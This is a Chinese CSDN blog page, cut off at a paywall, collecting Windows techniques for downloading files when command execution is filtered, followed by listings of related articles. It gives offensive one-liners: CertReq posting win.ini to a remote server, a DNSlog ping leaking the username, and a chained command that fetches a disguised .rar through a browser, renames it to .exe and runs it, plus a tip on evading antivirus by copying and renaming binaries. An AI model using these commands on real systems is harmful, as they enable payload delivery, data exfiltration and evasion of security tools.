bypass命令执行-简单梳理多种方式文件下载_命令执行

最新推荐文章于 2024-07-24 21:07:42 发布
最新推荐文章于 2024-07-24 21:07:42 发布
阅读量928 收藏 26
点赞数 18
分类专栏: 命令执行 文章标签: bypass 命令执行 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135861480
版权

参考资料

https://toutiao.io/posts/uh65arq/preview
https://www.freebuf.com/system/232074.html
https://lolbas-project.github.io/

小Tips

针对一些杀软,可以cp到别的文件夹,然后重命名,或添加一些签名,可能可以运行下载的指令

半路收集的

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
finger kali@192.168.180.190 | more +8 >1.txt
    https://www.slashroot.in/finger-server-configuration-linux。

0、浏览器

start firefox http://xxxxxx/demo.rar
start chrome http://xxxxxx/demo.rar
start msedge http://xxxxxx/demo.rar

上面三种都会默认下载到C:\Users\username\Downloads 这个目录下, username 是当前用户名称

ping %USERNAME%.xxx.xx.dnslog.cn 可以获取到用户名 拼接即可

一条命令


start msedge http://xxxxx/123123123.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "123123123.rar""') do set kk=%k && (set dd=%kk:123123123.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%

除了cmd /c 以外可以直接跟命令执行的

1、Pcalua

Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的⼀个组件。

pcalua.exe
最低0.47元/天 解锁文章
qq_36334672
关注
  • 18
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行 bypass
weixin_66977568的博客
09-25 279
命令执行 bypass
关于命令执行Bypass的一些思路
hackzkaq的博客
08-24 1248
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-xiao_yi 一、常见命令执行的函数 system() system(string $command, int &$return_var = ?): string 执行系统命令,有回显 passthru() passthru(string $command, int &$return_var = ?): void 执行系统命令并且显示原始输出 shell_exec() shell_exec(string
命令执行bypass分享
2301_80127209的博客
03-14 1516
今天和各位大佬一起发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。在实际绕过中,可以用多种方式来组合测试进行绕过,可以看出本篇多次使用各种组合来执行命令,主要是希望哥哥们多去尝试,发散思维。
bypass命令
captain
10-14 889
#bypass cli> ports all get current-mode cli>ports set poweroff-mode normal
命令注入 bypass list
3569
02-12 1448
真的全啊,备份下。原文 https://xz.aliyun.com/t/3918   命令注入 OS命令注入(也称为shell注入)是一种web安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分,利用信任关系将攻击转移到组织内的其他系统。 前置知识 说到命令注入...
CTF Linux 命令执行常规bypass
weixin_30892889的博客
09-11 1578
截断符 常见的RCE的形式是给一个ping的命令执行,只需要输入ip,然后返回ping ip的输出信息 常见的用来截断的符号 & && ; | || windows或linux下: command1 && command2 先执行command1后执行command2 command1 | command2 只执行c...
「干货」Linux 应急响应日志分析命令「详细总结」
橙留香Park的博客
02-25 6288
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
bypass-paywalls-chrome-master_bypass_sitetemplate_
09-29
Bypass website paywalls
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
bypass-signcode-x3.xem_bypass_TheClient_XingCode_XIgnCode3ByPass
10-01
A host-based emulator bypass for Wellbia's XignCode3.Emulates the integrity-check for XignCode3 through a host-application.A host application launches/initializes XignCode3 causing XignCode3 to run ...
Qualcomm-BYPASS-2021-for-test-main_bypassauth_
10-02
压缩包文件"Qualcomm-BYPASS-2021-for-test-main"很可能包含了与这个技术相关的工具、代码片段、测试案例或者分析报告。研究这些内容可以帮助我们更深入地理解这种认证绕过是如何实现的,以及如何防止类似的攻击。 ...
Bypass-for-Screen-Lock-of-Android.rar_技术管理_Java_
08-11
:随着移动通信技术的迅速发展和广泛应用,手机内部包含的信息已经成为犯罪侦查重要的线索和证据来源。由于人们对数据安全和隐私保护意识的提高,以及涉案嫌疑人的反侦查意识的增强,涉案的智能手机通常带有锁屏密码...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 398
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1043
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 273
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 671
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 558
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
最新发布
Leiditech_的博客
07-24 857
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用中通常并接在电路中,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路中的电流和电压突变,产生浪涌。
sql 作业计划 执行powershell命令
07-08
要在SQL作业计划中执行PowerShell命令,您可以使用`xp_cmdshell`存储过程来运行PowerShell脚本。请注意,执行`xp_cmdshell`需要适当的权限。 以下是一个示例,演示如何在SQL作业计划中执行PowerShell命令: 1. 首先,确保已启用`xp_cmdshell`存储过程。您可以使用以下命令进行检查和启用: ```sql -- 检查xp_cmdshell的状态 sp_configure 'show advanced options', 1; GO RECONFIGURE; GO sp_configure 'xp_cmdshell'; GO -- 启用xp_cmdshell sp_configure 'xp_cmdshell', 1; GO RECONFIGURE; GO ``` 2. 创建一个新的SQL作业,并在步骤中执行PowerShell命令。以下是一个示例: - 步骤类型:Transact-SQL脚本 - 脚本内容: ```sql EXEC master..xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -File "C:\path\to\your\powershell_script.ps1"'; ``` 此示例中,您需要将`C:\path\to\your\powershell_script.ps1`替换为实际的PowerShell脚本文件路径。 3. 配置其他作业计划属性,例如调度和通知选项。 请确保在执行PowerShell命令时,SQL Server服务帐户具有适当的权限来运行PowerShell脚本和执行所需的操作。此外,确保PowerShell脚本的执行策略允许从SQL Server执行。 请注意,使用`xp_cmdshell`存储过程可能存在安全风险,请确保仅在受信任的环境中使用,并且仅允许受信任的用户或角色访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值